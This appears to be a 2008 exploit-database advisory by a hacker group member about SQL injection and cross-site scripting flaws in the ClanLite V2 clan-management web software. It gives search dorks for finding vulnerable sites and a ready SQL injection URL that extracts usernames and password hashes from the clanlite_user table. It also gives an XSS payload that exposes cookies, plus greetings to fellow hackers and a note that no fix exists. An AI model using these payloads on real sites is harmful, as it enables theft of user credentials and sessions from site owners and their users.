ClanLite 2.x (SQL Injection-XSS) Multiple Remote Vulnerabilities

2008-05-12 00:00:00

########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################

ClanLite V2 SQL inj. & XSS

dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005

dork: Themed By Ray © 2003, 2004 iOptional

readme script

/****************************************************************************
* Fichier : *
* Copyright : (C) 2004 ClanLite V2 *
* Email : [email protected] *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
***************************************************************************/

author: ZoRLu

home: ( yildirimordulari.org ) ( z0rlu.ownspace.org ) ( milw0rm.org ) ( r00tsecurity.org ) ( securityfocus.com )

contact: [email protected] & [email protected] ( baska msn yok taklitlerden kacInIn )

Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... La benden keylog isyetesiniz diye vermiyorum msn i. sacmalamayIn da :((

Not: http://www.z0rlu.ownspace.org acIklarIn kullanImI ile ilgili bilgiler blogumda mevcut! naparsIn para yokk free actIk :))

########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################

http://localhost/clanlite_path/service/profil.php?link=[SQL]


[SQL]=

ZoRLu'/**/union/**/select/**/null,null,mail,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,0x3a,psw),null,null,null/**/from/**/clanlite_user/*


[XSS]=

http://localhost/clanlite/service/calendrier.php?mois=6&annee="><script>alert(document.cookie)</script>


########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################

thanx: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, bLaCk, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK,

kasIrga(lavrens), w3R3m, avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org

O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :)) )

Efsane: YILDIRIMORDULARI.ORG

Dersler BasladI Sanal Bitti :(((

########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.